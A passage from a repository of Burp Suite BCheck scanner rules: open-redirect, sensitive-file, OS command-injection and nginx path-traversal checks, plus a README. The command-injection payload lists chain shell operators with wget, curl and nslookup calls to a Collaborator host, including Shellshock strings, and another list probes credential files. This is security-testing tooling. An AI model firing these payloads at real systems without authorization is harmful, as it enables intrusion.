 69 |         `/http:/example.com`,
 70 |         `/https:/%5cexample.com/`,
 71 |         `/https://%09/example.com`,
 72 |         `/https://%5cexample.com`,
 73 |         `/https:///example.com/%2e%2e`,
 74 |         `/https:///example.com/%2f%2e%2e`,
 75 |         `/https://example.com`,
 76 |         `/https://example.com/`,
 77 |         `/https://example.com/%2e%2e`,
 78 |         `/https://example.com/%2e%2e%2f`,
 79 |         `/https://example.com/%2f%2e%2e`,
 80 |         `/https://example.com/%2f..`,
 81 |         `/https://example.com//`,
 82 |         `/https:example.com`,
 83 |         `/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com`,
 84 |         `/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com`,
 85 |         `/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com`
 86 | 
 87 | given path then
 88 |     send request called check:
 89 |         method: "GET"
 90 |         path: {injections}
 91 | 
 92 |     if {latest.response.status_code} is "301" or
 93 |         {latest.response.status_code} is "302" then
 94 |         # Make sure the Location: header is not contains the original domain
 95 |         if ({injections} in {latest.response.headers}) and
 96 |             not({base.request.url.host} in {latest.response.headers}) then
 97 |             report issue:
 98 |                 severity: low
 99 |                 confidence: firm
100 |                 detail: `{issueDetail}`
101 |                 remediation: `{issueRemediation}`
102 |         end if
103 |     end if
104 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Custom BCheck Scan
 2 | 
 3 | This repository stores some of my custom BCheck Scan configurations.
 4 | Its goal is to identify intriguing elements that warrant further manual testing.
 5 | 
 6 | Further information on [BCheck](https://github.com/PortSwigger/BChecks) can be found at the provided link.
 7 | 
 8 | ## Repository Structure
 9 | 
10 | The structure of this repository is as follows:
11 | 
12 | ```bash
13 | custom-bcheck-scan/
14 | ├── passives                   # Passive analysis on the response to identify elements worthy of further investigation. 🧬 Be careful as certain rules may trigger excessive alerts 🧬
15 | ├── common                     # Common check for misconfigurations for specific technology/framework/language
16 | ├── sensitive                  # Common check for sensitive files
17 | ├── vulnerability-classes      # Specifically targeting a particular type of vulnerability such as sqli, xss, etc.
18 | ├── testing                    # Testing scan that I'm still experimenting with
19 | .
20 | ```
21 | 
22 | ## List of Burp Extensions that can be replace by BCheck scans in this repository
23 | 
24 | I'd like to express my gratitude to the creator of these Burp Extensions and some other open-sources tools. Their work has been instrumental in enabling my BCheck scans. While I've made every effort to recreate these extensions in BCheck, it's inevitable that mistakes may occur. If there are any areas I've overlooked, please don't hesitate to contribute and help improve them.
25 | 
26 | |      **My BCheck Scan**       |  **Noise**  |  **Extension Name & Author** |
27 | |:-----------------------------:|:-----------:|:-----------------------------|
28 | |[interesting-error-message](passives/interesting-error-message.bcheck) | 🚨 | [burp-suite-error-message-checks](https://github.com/augustd/burp-suite-error-message-checks) by [@augustd](https://github.com/augustd) and [gf](https://github.com/tomnomnom/gf) by [@tomnomnom](https://github.com/tomnomnom) |
29 | |[interesting-parameters](passives/interesting-parameters.bcheck) | 🚨 | [HUNT](https://github.com/bugcrowd/HUNT) by [@jhaddix](https://github.com/jhaddix) and [Gf-Patterns](https://github.com/1ndianl33t/Gf-Patterns) by [@1ndianl33t](https://github.com/1ndianl33t) |
30 | |[open-redirect-on-param](vulnerability-classes/open-redirect-on-param.bcheck) & [open-redirect-on-path](vulnerability-classes/open-redirect-on-path.bcheck) | - | Part of the [OpenRedireX](https://github.com/devanshbatham/OpenRedireX) by [@devanshbatham](https://github.com/devanshbatham) |
31 | |[nginx-off-by-slash](vulnerability-classes/nginx-off-by-slash.bcheck) | 🚨 | Part of the [nginx off-by-slash](https://github.com/bayotop/off-by-slash) by [@bayotop](https://github.com/bayotop) and [@tomnomnom](https://github.com/tomnomnom) |
32 | |[interesting-pingback-via-header](vulnerability-classes/interesting-pingback-via-header.bcheck) & [interesting-pingback-via-param](vulnerability-classes/interesting-pingback-via-param.bcheck)| 🚨 | Part of the [collaborator-everywhere](https://github.com/PortSwigger/collaborator-everywhere) by [James Kettle](https://twitter.com/albinowax) |
33 | |[host-header-injection](vulnerability-classes/host-header-injection.bcheck)| - | Small part of the [host_header_inchecktion](https://github.com/fabianbinna/host_header_inchecktion) by [@fabianbinna](https://github.com/fabianbinna) |
34 | |[command-injection-on-param](vulnerability-classes/command-injection-on-param.bcheck)| - | Small part of the [shelling](https://github.com/ewilded/shelling) by [@ewilded](https://github.com/ewilded) |
35 | 
36 | 
37 | > Kindly note that certain scans may produce excessive noise and generate numerous informational alerts post-scanning. It would be advisable to deactivate this feature by default and initiate scans only when necessary and for in-scope item only.
38 | 
39 | 
40 | ***
41 | 
42 | ## How to test the BCheck scan
43 | 
44 | You have two options for testing the scan:
45 | 
46 | ### Option 1: Import and Start Scanning
47 | You can import all scans and begin scanning immediately.
48 | 
49 | ### Option 2: Inspect Each Scan Using BSCode Editor
50 | Follow the steps below to inspect each scan using the BSCode Editor:
51 | 
52 | 1. Open BurpSuite and navigate to Extensions -> BCheck.
53 | 2. Click on 'New' -> Blank.
54 |    ![bscode-editor](https://github.com/j3ssie/custom-bcheck-scan/assets/23289085/022236ad-25c6-4b0b-a425-5a9ba2cda024)
55 | 3. Copy any scan into the editor.
56 | 4. Right-click on any request/response and select 'Send to BCheck Editor'.
57 |    ![send-to-bcheck](https://github.com/j3ssie/custom-bcheck-scan/assets/23289085/7626e877-7606-468b-8159-314721d58fa9)
58 | 
59 | 5. Click on 'Validate' to ensure the scan is correct, then click 'Run Test' to observe how the rule runs.
60 | 
61 | 6. "Now, you can view the details of the request in the 'Logger' tab and any identified issues in the 'Issue Activity' tab."
62 |    ![view-issue](https://github.com/j3ssie/custom-bcheck-scan/assets/23289085/b78be913-863f-41cb-9aff-bcda8db9187e)
63 | 


--------------------------------------------------------------------------------
/sensitive/sensitive-file-without-ext-exposed.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Sensitive File Without Extension Exposed"
  4 |     description: "Tests for exposed Sensitive File Without Extension in current path and at the root directory of site"
  5 |     author: "j3ssie"
  6 |     tags: "exposure", "sensitive", "no-ext"
  7 | 
  8 | define:
  9 |     garbage_path = `/hopefullyget404.log`
 10 |     issueName = `Sensitive File Without Extension`
 11 | 
 12 | run for each:
 13 |     # you could add more values to this list to make the check repeat
 14 |     sensitive_path =
 15 |         "cloud/.credentials",
 16 |         "cloud/.s3cfg",
 17 |         "cloud/.tugboat",
 18 |         "db/.pgpass",
 19 |         "BUILD",
 20 |         "Berksfile",
 21 |         "Cakefile",
 22 |         "Capfile",
 23 |         "Cartfile",
 24 |         "Dockerfile",
 25 |         "Doxyfile",
 26 |         "Entries",
 27 |         "GNUmakefile",
 28 |         "Gemfile",
 29 |         "Guardfile",
 30 |         "Gulpfile",
 31 |         "HEAD",
 32 |         "Jenkinsfile",
 33 |         "Makefile",
 34 |         "Manifest",
 35 |         "Modulefile",
 36 |         "NAMESPACE",
 37 |         "PKG-INFO",
 38 |         "PKGBUILD",
 39 |         "Podfile",
 40 |         "Procfile",
 41 |         "Puppetfile",
 42 |         "Rakefile",
 43 |         "Repository",
 44 |         "Root",
 45 |         "SConscript",
 46 |         "Thorfile",
 47 |         "Vagrantfile",
 48 |         "__debug__",
 49 |         "_debug",
 50 |         "_index",
 51 |         "_search",
 52 |         "debug",
 53 |         "aliases",
 54 |         "all",
 55 |         "api/v1/label/version/values",
 56 |         "api/v1/labels",
 57 |         "api/v1/pods",
 58 |         "api/v1/targets",
 59 |         "app-stats",
 60 |         "artisan",
 61 |         "bashrc",
 62 |         "bootstrap",
 63 |         "build",
 64 |         "bundle",
 65 |         "certs",
 66 |         "check_deploy",
 67 |         "chefignore",
 68 |         "cibuild",
 69 |         "clean",
 70 |         "clusters",
 71 |         "cmdline",
 72 |         "compat",
 73 |         "compile",
 74 |         "conf",
 75 |         "config",
 76 |         "config_dump",
 77 |         "configure",
 78 |         "console",
 79 |         "control",
 80 |         "default",
 81 |         "depcomp",
 82 |         "deploy",
 83 |         "description",
 84 |         "destroy",
 85 |         "dirs",
 86 |         "docs",
 87 |         "empty",
 88 |         "env",
 89 |         "events",
 90 |         "export",
 91 |         "format",
 92 |         "functions",
 93 |         "generate",
 94 |         "gitconfig",
 95 |         "gitignore",
 96 |         "gradlew",
 97 |         "heapdump",
 98 |         "hosts",
 99 |         "hub",
100 |         "init",
101 |         "input",
102 |         "inventory",
103 |         "io",
104 |         "jkstatus",
105 |         "main",
106 |         "makefile",
107 |         "manifest",
108 |         "master",
109 |         "metrics",
110 |         "missing",
111 |         "mvnw",
112 |         "oom_score",
113 |         "options",
114 |         "out",
115 |         "output",
116 |         "package-list",
117 |         "postinst",
118 |         "pre-commit",
119 |         "profiler",
120 |         "proftpdpasswd",
121 |         "pylintrc",
122 |         "rails",
123 |         "rails/info",
124 |         "rake",
125 |         "rebar",
126 |         "release",
127 |         "routes",
128 |         "rspec",
129 |         "rules",
130 |         "run",
131 |         "runtime",
132 |         "series",
133 |         "server",
134 |         "server_info",
135 |         "setup",
136 |         "sidekiq",
137 |         "smaps",
138 |         "spec",
139 |         "spring",
140 |         "start",
141 |         "stat",
142 |         "status",
143 |         "symfony_requirements",
144 |         "tags",
145 |         "tg",
146 |         "type",
147 |         "unit_masks",
148 |         "update",
149 |         "version",
150 |         "vimrc",
151 |         "watch",
152 |         "workers",
153 |         "wscript",
154 |         "www",
155 |         "yii",
156 |         "zshrc",
157 |         "_private",
158 |         "iiasdmpwd",
159 |         "iisadmin"
160 | 
161 | given path then
162 |     # replace the potential path with the last path
163 |     send request called check:
164 |         method: "GET"
165 |         replacing path: `{regex_replace({regex_replace({base.request.url}, "^.*?\/.*?\/.*?\/", "/")}, "([^/]+)$", "")}{sensitive_path}`
166 | 
167 |     # send a random request in the hopes of effectively filtering out false positives
168 |     send request called garbage:
169 |         replacing path: `{garbage_path}`
170 | 
171 |     if {check.response.status_code} is "200" and
172 |         ({check.response.headers} matches "text/plain" or
173 |         {check.response.headers} matches ".*octet-stream.*") then
174 |         if not({garbage.response.headers} matches "text/plain") and
175 |             not({garbage.response.headers} matches ".*octet-stream.*") then
176 |             # actually check the differs in the response
177 |             if {garbage.response.body} differs from {check.response.body} then
178 |                 # make sure some HTML is not present in the response
179 |                 if not({check.response.body} matches "(?i)(\<\!doctype|\<html|\<head|\<body)") and
180 |                     not({check.response.body} matches "(?i)(Oops!|Whoops!|AutodiscoverService|not\sfound|Request\sRejected|Access\sDenied|a\sbad\sURL|has\sbeen\slocked)") then
181 |                     report issue and continue:
182 |                         severity: low
183 |                         confidence: tentative
184 |                         detail: `{issueName} found at {check.request.url}. Manual investigation is advised`
185 |                         remediation: `Ensure the file {sensitive_path} are not exposed from your webroot`
186 |                 end if
187 |             end if
188 |         end if
189 |     end if
190 | 


--------------------------------------------------------------------------------
/vulnerability-classes/command-injection-on-param.bcheck:
--------------------------------------------------------------------------------
 1 | metadata:
 2 |     language: v2-beta
 3 |     name: "OS Command Injection on Parameter"
 4 |     description: "OS command injection is also known as shell injection. It allows an attacker to execute operating system (OS) commands on the server that is running an application, and typically fully compromise the application and its data"
 5 |     author: "j3ssie"
 6 |     tags: "rce", "command-injection", "injection", "os-command-injection", "oast", "out-of-band"
 7 | 
 8 | define:
 9 |     issueDetail = `OS command injection on via Parameter {latest.request.url}`
10 |     references = `
11 |     ## References:
12 |     - https://github.com/ewilded/shelling
13 |     - https://portswigger.net/web-security/os-command-injection
14 |     - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection
15 |     - https://github.com/projectdiscovery/fuzzing-templates/tree/main/cmdi
16 |     - https://bishopfox.com/blog/ruby-vulnerabilities-exploits
17 |     - https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html`
18 |     issueRemediation = `Never call out to OS commands from application-layer code
19 |      {references}`
20 |     # matchString = {random_str(20)} # somehow this cause an error
21 |     # md5('bcheck-ci-test')
22 |     matchString = "5d479e540dab9cb284f120082d20b37c"
23 | 
24 | run for each:
25 |     injections =
26 |         `echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
27 |         `%20echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
28 |         `;echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
29 |         `&echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
30 |         `|echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
31 |         `||echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
32 |         `&&echo%205d479e540dab9cb284f120082d20b37c$((69%2B52)$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
33 |         `%0aecho%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
34 |         `%3Becho%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
35 |         `%26echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
36 |         `%26%26echo%205d479e540dab9cb284f120082d20b37c$((69%2B52)$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
37 |         `%7Cecho%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
38 |         `%7C%7Cecho%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
39 |         `&nslookup {generate_collaborator_address()}&'\\\"\`0&nslookup {generate_collaborator_address()}&\`'`,
40 |         `|nslookup {generate_collaborator_address()}|curl {generate_collaborator_address()}`,
41 |         `1;nslookup$\{IFS\}{generate_collaborator_address()};#$\{IFS\}';nslookup$\{IFS\}{generate_collaborator_address()};#$\{IFS\}\";nslookup$\{IFS\}{generate_collaborator_address()};#$\{IFS\}`,
42 |         `/*$(nslookup {generate_collaborator_address()})\`nslookup {generate_collaborator_address()}\`\`*/-nslookup({generate_collaborator_address()})-'/*$(nslookup {generate_collaborator_address()})\`nslookup {generate_collaborator_address()}\` #*/-nslookup({generate_collaborator_address()})||'\"||nslookup({generate_collaborator_address()})||\"/*\`*/`,
43 |         `$(ping -c 1 {generate_collaborator_address()} | nslookup {generate_collaborator_address()} ; wget {generate_collaborator_address()} -O /dev/null)`,
44 |         `() \{ :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://{generate_collaborator_address()}?vuln=13;curl http://{generate_collaborator_address()}?vuln=15;\");'`,
45 |         `() \{ :;}; wget http://{generate_collaborator_address()}?vuln=11`,
46 |         `| wget http://{generate_collaborator_address()}/.testing/rce.txt`,
47 |         `& wget http://{generate_collaborator_address()}/.testing/rce.txt`,
48 |         `; wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt`,
49 |         `$(\`wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt\`)`,
50 |         `&& wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt`,
51 |         `wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt`,
52 |         `$(\`wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt?req=22jjffjbn\`)`
53 | 
54 | given insertion point then
55 |     send payload called check1:
56 |         replacing: {injections}
57 | 
58 |     send payload called check2:
59 |         appending: {injections}
60 | 
61 |     if (`{matchString}` in {check1.response.body}) or
62 |         (`{matchString}` in {check2.response.body}) then
63 |         if not(`{matchString}` in {base.response.body}) then
64 |             report issue:
65 |                 severity: high
66 |                 confidence: tentative
67 |                 detail: `{issueDetail}`
68 |                 remediation: `{issueRemediation}`
69 |         end if
70 |     end if
71 | 
72 |     if http interactions then
73 |         report issue:
74 |             severity: high
75 |             confidence: tentative
76 |             detail: `{issueDetail}`
77 |             remediation: `{issueRemediation}`
78 |     end if
79 | 
80 |     if dns interactions then
81 |         report issue:
82 |             severity: medium
83 |             confidence: tentative
84 |             detail: `{issueDetail}`
85 |             remediation: `{issueRemediation}`
86 |     end if
87 | 


--------------------------------------------------------------------------------
/vulnerability-classes/command-injection-on-header.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "OS Command Injection on Header"
  4 |     description: "OS command injection is also known as shell injection. It allows an attacker to execute operating system (OS) commands on the server that is running an application, and typically fully compromise the application and its data"
  5 |     author: "j3ssie"
  6 |     tags: "rce", "command-injection", "injection", "os-command-injection", "oast", "out-of-band"
  7 | 
  8 | define:
  9 |     issueDetail = `OS command injection on via Parameter {latest.request.url}`
 10 |     references = `
 11 |     ## References:
 12 |     - https://github.com/ewilded/shelling
 13 |     - https://portswigger.net/web-security/os-command-injection
 14 |     - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/12-Testing_for_Command_Injection
 15 |     - https://github.com/projectdiscovery/fuzzing-templates/tree/main/cmdi
 16 |     - https://bishopfox.com/blog/ruby-vulnerabilities-exploits
 17 |     - https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html`
 18 |     issueRemediation = `Never call out to OS commands from application-layer code
 19 |      {references}`
 20 |     # matchString = {random_str(20)} # somehow this cause an error
 21 |     # md5('bcheck-ci-test')
 22 |     matchString = "5d479e540dab9cb284f120082d20b37c"
 23 | 
 24 | run for each:
 25 |     injections =
 26 |         `echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 27 |         `%20echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 28 |         `;echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 29 |         `&echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 30 |         `|echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 31 |         `||echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 32 |         `&&echo%205d479e540dab9cb284f120082d20b37c$((69%2B52)$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 33 |         `%0aecho%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 34 |         `%3Becho%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 35 |         `%26echo%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 36 |         `%26%26echo%205d479e540dab9cb284f120082d20b37c$((69%2B52)$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 37 |         `%7Cecho%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 38 |         `%7C%7Cecho%205d479e540dab9cb284f120082d20b37c$((69%2B52))$(echo%205d479e540dab9cb284f120082d20b37c)5d479e540dab9cb284f120082d20b37c`,
 39 |         `&nslookup {generate_collaborator_address()}&'\\\"\`0&nslookup {generate_collaborator_address()}&\`'`,
 40 |         `|nslookup {generate_collaborator_address()}|curl {generate_collaborator_address()}`,
 41 |         `1;nslookup$\{IFS\}{generate_collaborator_address()};#$\{IFS\}';nslookup$\{IFS\}{generate_collaborator_address()};#$\{IFS\}\";nslookup$\{IFS\}{generate_collaborator_address()};#$\{IFS\}`,
 42 |         `/*$(nslookup {generate_collaborator_address()})\`nslookup {generate_collaborator_address()}\`\`*/-nslookup({generate_collaborator_address()})-'/*$(nslookup {generate_collaborator_address()})\`nslookup {generate_collaborator_address()}\` #*/-nslookup({generate_collaborator_address()})||'\"||nslookup({generate_collaborator_address()})||\"/*\`*/`,
 43 |         `$(ping -c 1 {generate_collaborator_address()} | nslookup {generate_collaborator_address()} ; wget {generate_collaborator_address()} -O /dev/null)`,
 44 |         `() \{ :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://{generate_collaborator_address()}?vuln=13;curl http://{generate_collaborator_address()}?vuln=15;\");'`,
 45 |         `() \{ :;}; wget http://{generate_collaborator_address()}?vuln=11`,
 46 |         `| wget http://{generate_collaborator_address()}/.testing/rce.txt`,
 47 |         `& wget http://{generate_collaborator_address()}/.testing/rce.txt`,
 48 |         `; wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt`,
 49 |         `$(\`wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt\`)`,
 50 |         `&& wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt`,
 51 |         `wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt`,
 52 |         `$(\`wget https://{generate_collaborator_address()}/.testing/rce_vuln.txt?req=22jjffjbn\`)`
 53 | 
 54 |     headerName =
 55 |         "Host",
 56 |         "Referer",
 57 |         "Host",
 58 |         "X-Original-URL",
 59 |         "Profile",
 60 |         "X-Arbitrary",
 61 |         "X-HTTP-DestinationURL",
 62 |         "X-Forwarded-Proto",
 63 |         "Origin",
 64 |         "X-Forwarded-Host",
 65 |         "X-Forwarded-Server",
 66 |         "X-Host",
 67 |         "Proxy-Host",
 68 |         "Destination",
 69 |         "Proxy",
 70 |         "Via"
 71 | 
 72 | given request then
 73 |     send request called check:
 74 |         headers:
 75 |             `{headerName}`: `{injections}`
 76 | 
 77 |     if (`{matchString}` in {check.response.body}) then
 78 |         if not(`{matchString}` in {base.response.body}) then
 79 |             report issue:
 80 |                 severity: high
 81 |                 confidence: tentative
 82 |                 detail: `{issueDetail}`
 83 |                 remediation: `{issueRemediation}`
 84 |         end if
 85 |     end if
 86 | 
 87 |     if http interactions then
 88 |         report issue:
 89 |             severity: high
 90 |             confidence: tentative
 91 |             detail: `{issueDetail}`
 92 |             remediation: `{issueRemediation}`
 93 |     end if
 94 | 
 95 |     if dns interactions then
 96 |         report issue:
 97 |             severity: medium
 98 |             confidence: tentative
 99 |             detail: `{issueDetail}`
100 |             remediation: `{issueRemediation}`
101 |     end if
102 | 


--------------------------------------------------------------------------------
/vulnerability-classes/nginx-off-by-slash.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Nginx off by slash"
  4 |     description: "Path traversal via Nginx Misconfiguration | Nginx off-by-slash"
  5 |     author: "j3ssie"
  6 |     tags: "nginx", "path-traversal", "off-by-slash", "injection"
  7 | 
  8 | define:
  9 |     references = `
 10 |     ## References:
 11 |     - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
 12 |     - https://github.com/bayotop/off-by-slash
 13 |     - https://github.com/yandex/gixy/blob/master/docs/en/plugins/aliastraversal.md
 14 |     - https://labs.hakaioffsec.com/nginx-alias-traversal/
 15 |     `
 16 |     issueRemediation = `Nginx off by slash. Manual Review is recommended.
 17 |     {references}`
 18 |     issueDetail = `Nginx off by slash`
 19 | 
 20 | run for each:
 21 |     injections = "..", "..;", "..%3B"
 22 |     suffix =
 23 |         "files",
 24 |         "_static",
 25 |         "admin",
 26 |         "adminer",
 27 |         "alpha",
 28 |         "app1-static",
 29 |         "app2-static",
 30 |         "app_dir",
 31 |         "app_nginx_static_path",
 32 |         "asset_img",
 33 |         "assets",
 34 |         "audio",
 35 |         "awstats",
 36 |         "backend",
 37 |         "base_dir",
 38 |         "blankon",
 39 |         "blob",
 40 |         "blue",
 41 |         "bootstrap",
 42 |         "build",
 43 |         "cgi-bin",
 44 |         "challenge",
 45 |         "challenges",
 46 |         "chiminey",
 47 |         "clld_dir",
 48 |         "collected_static",
 49 |         "community",
 50 |         "content",
 51 |         "counterblockd",
 52 |         "counterwallet",
 53 |         "css",
 54 |         "custom",
 55 |         "data",
 56 |         "default",
 57 |         "demo",
 58 |         "demo-app",
 59 |         "developerslv",
 60 |         "dist",
 61 |         "doc",
 62 |         "docs",
 63 |         "download",
 64 |         "downloads",
 65 |         "error",
 66 |         "errors",
 67 |         "export",
 68 |         "favicons",
 69 |         "favs",
 70 |         "films",
 71 |         "flask_test_uploads",
 72 |         "fm",
 73 |         "font-icons",
 74 |         "fonts",
 75 |         "frontend",
 76 |         "ftp",
 77 |         "ftpmaster",
 78 |         "hgs-static",
 79 |         "higlass-website",
 80 |         "home",
 81 |         "horde",
 82 |         "htdocs",
 83 |         "html",
 84 |         "httpboot",
 85 |         "icon",
 86 |         "icons",
 87 |         "ikiwiki",
 88 |         "image_data",
 89 |         "images",
 90 |         "img",
 91 |         "install",
 92 |         "items",
 93 |         "javascript",
 94 |         "js",
 95 |         "js-plugin",
 96 |         "khanlinks",
 97 |         "kibana",
 98 |         "kolab-syncroton",
 99 |         "latest",
100 |         "layout",
101 |         "legal",
102 |         "lemonldap-ng-doc",
103 |         "lemonldap-ng-fr-doc",
104 |         "letsencrypt",
105 |         "lib",
106 |         "libs",
107 |         "log",
108 |         "logging",
109 |         "mailinabox",
110 |         "mailman",
111 |         "main_user",
112 |         "manual",
113 |         "media",
114 |         "memcached",
115 |         "minified",
116 |         "misc",
117 |         "moodledata",
118 |         "msks",
119 |         "munki_repo",
120 |         "music",
121 |         "name",
122 |         "new-js",
123 |         "nginx",
124 |         "noVNC",
125 |         "node_modules",
126 |         "oldsanta",
127 |         "option",
128 |         "outputs",
129 |         "owncloud",
130 |         "packed",
131 |         "patchwork",
132 |         "path",
133 |         "pictures",
134 |         "plugin_static",
135 |         "postfixadmin",
136 |         "prod",
137 |         "project_root",
138 |         "pub",
139 |         "public",
140 |         "public_html",
141 |         "public_root",
142 |         "qv-frontend",
143 |         "repo",
144 |         "repos",
145 |         "repository",
146 |         "resources",
147 |         "resourcesync",
148 |         "results",
149 |         "robots",
150 |         "root",
151 |         "roundcube",
152 |         "roundcubemail",
153 |         "run",
154 |         "script",
155 |         "scripts",
156 |         "shared",
157 |         "shibboleth",
158 |         "site-library",
159 |         "sitestatic",
160 |         "spearmint",
161 |         "src",
162 |         "stackato-pkg",
163 |         "static",
164 |         "static-collected",
165 |         "static-html",
166 |         "static-root",
167 |         "static_prod",
168 |         "static_root",
169 |         "static_user",
170 |         "staticfiles",
171 |         "stats",
172 |         "storage",
173 |         "style",
174 |         "styles",
175 |         "stylesheets",
176 |         "target",
177 |         "temp",
178 |         "templates",
179 |         "test",
180 |         "testfiles",
181 |         "tests",
182 |         "theme",
183 |         "theme_static",
184 |         "thumb",
185 |         "thumbs",
186 |         "tiedostot",
187 |         "tmp",
188 |         "ubuntu",
189 |         "ui",
190 |         "upfiles",
191 |         "upload",
192 |         "uploads",
193 |         "videos",
194 |         "web",
195 |         "web-dist",
196 |         "webroot_path",
197 |         "websocket",
198 |         "webstatic",
199 |         "well-known",
200 |         "whturk",
201 |         "wp-content",
202 |         "www",
203 |         "www-data"
204 | 
205 | given path then
206 |     # append the injection to the first part of the path
207 |     # e.g: /static/main.js -> this will send the request to /static{injections}/main.js
208 |     send request called check1:
209 |         method: "GET"
210 |         replacing path: {regex_replace({base.request.url.path}, "\.*([^\/]+)\/", `$1{injections}/`)}
211 | 
212 |     send request called check2:
213 |         method: "GET"
214 |         replacing path: {regex_replace({base.request.url.path}, "\.*([^\/]+)\/", `$1{injections}/{suffix}/`)}
215 | 
216 |     # if the response of '/static/main.js' and  '/static{injections}/main.js' is the same then we have an issue
217 |     if {check1.response.status_code} is "200" then
218 |         if not({check1.response.body} differs from {base.response.body}) then
219 |             report issue:
220 |                 severity: high
221 |                 confidence: tentative
222 |                 detail: `{issueDetail}`
223 |                 remediation: `{issueRemediation}`
224 |         end if
225 |     end if
226 | 
227 |     # if the response of '/static/main.js' and  '/static{injections}/{suffix}/main.js' is the same then we have an issue
228 |     if {check2.response.status_code} is "200" then
229 |         if not({check1.response.body} differs from {base.response.body}) then
230 |             report issue:
231 |                 severity: high
232 |                 confidence: tentative
233 |                 detail: `{issueDetail}`
234 |                 remediation: `{issueRemediation}`
235 |         end if
236 |     end if
237 | 


--------------------------------------------------------------------------------
/vulnerability-classes/path-traversal-on-param.bcheck:
--------------------------------------------------------------------------------
  1 | metadata:
  2 |     language: v2-beta
  3 |     name: "Path Traversal on Parameter"
